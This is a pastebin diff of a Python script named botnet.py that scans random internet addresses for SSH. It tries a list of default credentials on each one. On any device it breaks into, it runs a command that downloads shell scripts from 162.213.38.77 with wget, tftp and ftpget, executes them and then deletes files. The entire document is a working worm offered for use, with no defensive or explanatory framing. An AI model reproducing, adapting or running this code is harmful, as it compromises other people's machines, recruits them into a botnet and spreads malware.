SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/env python | |
2 | # -*- coding: utf-8 -*- | |
3 | ||
4 | # ulimit -n 999999; ulimit -u 999999 | |
5 | # sysctl -w fs.file-max=100000 | |
6 | # python botnet.py 376 LUCKY x 0 (LUCKY RANGES) | |
7 | # python botnet.py 376 B 113.53 1 (SCANNER EXAMPLE) | |
8 | # python botnet.py 376 RAND x all (IP RANDOMIZATION) | |
9 | # 113.53, 125.26, 125.27, 125, | |
10 | ||
11 | import threading, paramiko, random, socket, time, sys | |
12 | ||
13 | paramiko.util.log_to_file("/dev/null") # silents spam of paramiko | |
14 | ||
15 | files = [ # Binary names | |
16 | "cvb", | |
17 | "cvv", | |
18 | "dsf", | |
19 | "fdgxc", | |
20 | "sdf", | |
21 | "sdfv", | |
22 | "xnvx", | |
23 | ||
24 | ] | |
25 | ||
26 | website = "185.112.249.142" # Binary Host IP | |
27 | ||
28 | reservedips = [ | |
29 | 'http://127.', | |
30 | 'http://0', | |
31 | 'http://10.', | |
32 | 'http://100.64', | |
33 | 'http://100.65', | |
34 | 'http://100.66', | |
35 | 'http://100.67', | |
36 | 'http://100.68', | |
37 | 'http://100.69', | |
38 | 'http://100.70', | |
39 | 'http://100.71', | |
40 | 'http://100.72', | |
41 | 'http://100.73', | |
42 | 'http://100.74', | |
43 | 'http://100.75', | |
44 | 'http://100.76', | |
45 | 'http://100.77', | |
46 | 'http://100.78', | |
47 | 'http://100.79', | |
48 | 'http://100.80', | |
49 | 'http://100.81', | |
50 | 'http://100.82', | |
51 | 'http://100.83', | |
52 | 'http://100.84', | |
53 | 'http://100.85', | |
54 | 'http://100.86', | |
55 | 'http://100.87', | |
56 | 'http://100.88', | |
57 | 'http://100.89', | |
58 | 'http://100.90', | |
59 | 'http://100.91', | |
60 | 'http://100.92', | |
61 | 'http://100.93', | |
62 | 'http://100.94', | |
63 | 'http://100.95', | |
64 | 'http://100.96', | |
65 | 'http://100.97', | |
66 | 'http://100.98', | |
67 | 'http://100.99', | |
68 | 'http://100.100', | |
69 | 'http://100.101', | |
70 | 'http://100.102', | |
71 | 'http://100.103', | |
72 | 'http://100.104', | |
73 | 'http://100.105', | |
74 | 'http://100.106', | |
75 | 'http://100.107', | |
76 | 'http://100.108', | |
77 | 'http://100.109', | |
78 | 'http://100.110', | |
79 | 'http://100.111', | |
80 | 'http://100.112', | |
81 | 'http://100.113', | |
82 | 'http://100.114', | |
83 | 'http://100.115', | |
84 | 'http://100.116', | |
85 | 'http://100.117', | |
86 | 'http://100.118', | |
87 | 'http://100.119', | |
88 | 'http://100.120', | |
89 | 'http://100.121', | |
90 | 'http://100.122', | |
91 | 'http://100.123', | |
92 | 'http://100.124', | |
93 | 'http://100.125', | |
94 | 'http://100.126', | |
95 | 'http://100.127', | |
96 | 'http://169.254', | |
97 | 'http://172.16.', | |
98 | 'http://172.17.', | |
99 | 'http://172.18.', | |
100 | 'http://172.19.', | |
101 | 'http://172.20.', | |
102 | 'http://172.21.', | |
103 | 'http://172.22.', | |
104 | 'http://172.23.', | |
105 | 'http://172.24.', | |
106 | 'http://172.25.', | |
107 | 'http://172.26.', | |
108 | 'http://172.27.', | |
109 | 'http://172.28.', | |
110 | 'http://172.29.', | |
111 | 'http://172.30.', | |
112 | 'http://172.32.', | |
113 | 'http://192.0.0.0', | |
114 | 'http://192.0.0.1', | |
115 | 'http://192.0.0.2', | |
116 | 'http://192.0.0.3', | |
117 | 'http://192.0.0.4', | |
118 | 'http://192.0.0.5', | |
119 | 'http://192.0.0.6', | |
120 | 'http://192.0.0.7', | |
121 | 'http://192.0.2.', | |
122 | 'http://192.88.99.', | |
123 | 'http://192.168.', | |
124 | 'http://198.18.', | |
125 | 'http://198.19.', | |
126 | 'http://198.51.100.', | |
127 | 'http://203.0.113.', | |
128 | 'http://224.', | |
129 | 'http://225' | |
130 | ] | |
131 | ||
132 | ||
133 | passwords = [ # perls/la | |
134 | "root:root", | |
135 | "root:admin", | |
136 | "admin:admin", | |
137 | "ubnt:ubnt" | |
138 | "root:1234", | |
139 | "admin:1234", | |
140 | "guest:guest", | |
141 | "user:user", | |
142 | "test:test", | |
143 | "pi:raspberry", | |
144 | "vagrant:vagrant" | |
145 | ] | |
146 | ||
147 | ascii = '\x1b[1;35m'########################################################################### | |
148 | ascii +=' \r\n'# | |
149 | ascii +=' ▒███████▒ ▒█████ ███▄ █ ▓█████ ██████ ▓█████ ▄████▄ 0 \r\n'# | |
150 | ascii +=' ▒ ▒ ▒ ▄▀░▒██▒ ██▒ ██ ▀█ █ ▓█ ▀ ▒██ ▒ ▓█ ▀ ▒██▀ ▀█ \r\n'# | |
151 | ascii +=' ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ▀█ ██▒▒███ ░ ▓██▄ ▒███ ▒▓█ ▄ \r\n'# | |
152 | ascii +=' ▄▀▒ ░▒██ ██░▓██▒ ▐▌██▒▒▓█ ▄ ▒ ██▒▒▓█ ▄ ▒▓▓▄ ▄██▒ \r\n'# | |
153 | ascii +=' ▒███████▒░ ████▓▒░▒██░ ▓██░░▒████▒▒██████▒▒░▒████▒▒ ▓███▀ ░ \r\n'# | |
154 | ascii +=' ░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒░ ▒ ▒ ░░ ▒░ ░▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒ ░ \r\n'# | |
155 | ascii +=' ░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░ ░░ ░ ▒░ ░ ░ ░░ ░▒ ░ ░ ░ ░ ░ ░ ▒ \r\n'# | |
156 | ascii +=' ░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ \r\n'# | |
157 | ascii +=' ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ \r\n'# | |
158 | ascii +=' ░ ░ \r\n'# | |
159 | ascii +=' ~[ ZoneSec Cyber Rapist.]~ \r\n'# | |
160 | ascii +='\x1b[0m'############################################################################## | |
161 | ||
162 | print ascii | |
163 | print sys.argv[0]+' <Threads(MAX: 376)> <A/B/C/ (IP Class)> <Range> <1(slow but effective)/2(fast but less effective)/perl(scans for perlbots/all(scans for everything!>' | |
164 | ||
165 | if sys.argv[4] == '1': | |
166 | passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] #Slow but effective | |
167 | if sys.argv[4] == '2': | |
168 | passwords = [ "root:root", "admin:admin" ] #Fast but yet less effective | |
169 | if sys.argv[4] == 'perl': | |
170 | passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ] #perl scanner | |
171 | if sys.argv[4] == 'all': | |
172 | passwords = [ "pi:raspberry", "vagrant:vagrant", "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] # scans all passwords but very slow | |
173 | ||
174 | ipclassinfo = sys.argv[2] | |
175 | if ipclassinfo == "A": | |
176 | ip1 = sys.argv[3] | |
177 | elif ipclassinfo == "B": | |
178 | ip1 = sys.argv[3].split(".")[0] | |
179 | ip2 = sys.argv[3].split(".")[1] | |
180 | elif ipclassinfo == "C": | |
181 | ips = sys.argv[3].split(".") | |
182 | num=0 | |
183 | for ip in ips: | |
184 | num=num+1 | |
185 | if num == 1: | |
186 | ip1 = ip | |
187 | elif num == 2: | |
188 | ip2 = ip | |
189 | elif num == 3: | |
190 | ip3 = ip | |
191 | class sshscanner(threading.Thread): | |
192 | global passwords | |
193 | global ipclassinfo | |
194 | if ipclassinfo == "A": | |
195 | global ip1 | |
196 | elif ipclassinfo == "B": | |
197 | global ip1 | |
198 | global ip2 | |
199 | elif ipclassinfo == "C": | |
200 | global ip1 | |
201 | global ip2 | |
202 | global ip3 | |
203 | def run(self): | |
204 | while 1: | |
205 | try: | |
206 | while 1: | |
207 | thisipisbad='no' | |
208 | if ipclassinfo == "A": | |
209 | self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) | |
210 | elif ipclassinfo == "B": | |
211 | self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) | |
212 | elif ipclassinfo == "C": | |
213 | self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256)) | |
214 | elif ipclassinfo == "LUCKY": | |
215 | lucky = ["201.13","197.23","187.89","37.236","191.53","161.18","191.53","186.208","1.0","177.137","177.38","101.108","125.27","177.44","179.189","179.97","125.17"] | |
216 | self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) | |
217 | else: | |
218 | self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) | |
219 | for badip in reservedips: | |
220 | if badip in self.host: | |
221 | thisipisbad='yes' | |
222 | if thisipisbad=='no': | |
223 | break | |
224 | self.host=self.host.replace('http://', '') | |
225 | username='root' | |
226 | password="0" | |
227 | port = 22 | |
228 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
229 | s.settimeout(3) | |
230 | s.connect((self.host, port)) | |
231 | s.close() | |
232 | ssh = paramiko.SSHClient() | |
233 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
234 | dobreak=False | |
235 | for passwd in passwords: | |
236 | if ":n/a" in passwd: | |
237 | password="" | |
238 | else: | |
239 | password=passwd.split(":")[1] | |
240 | if "n/a:" in passwd: | |
241 | username="" | |
242 | else: | |
243 | username=passwd.split(":")[0] | |
244 | try: | |
245 | ssh.connect(self.host, port = port, username=username, password=password, timeout=3) | |
246 | dobreak=True | |
247 | break | |
248 | except: | |
249 | pass | |
250 | if True == dobreak: | |
251 | break | |
252 | badserver=True | |
253 | stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig") | |
254 | output = stdout.read() | |
255 | if "inet addr" in output: | |
256 | badserver=False | |
257 | websites = [ ] | |
258 | if badserver == False: | |
259 | print 'Adding:'+username+'<'+password+'>'+self.host+'|'+str(port) | |
260 | - | ssh.exec_command("put ur wget here ignore the shit up top.") #la |
260 | + | ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://162.213.38.77/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 162.213.38.77 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 162.213.38.77; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 162.213.38.77 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *") #la |
261 | ||
262 | time.sleep(15) | |
263 | ssh.close() | |
264 | except: | |
265 | pass | |
266 | ||
267 | for x in range(0,int(sys.argv[1])): | |
268 | try: | |
269 | t = sshscanner() | |
270 | t.start() | |
271 | except: | |
272 | pass |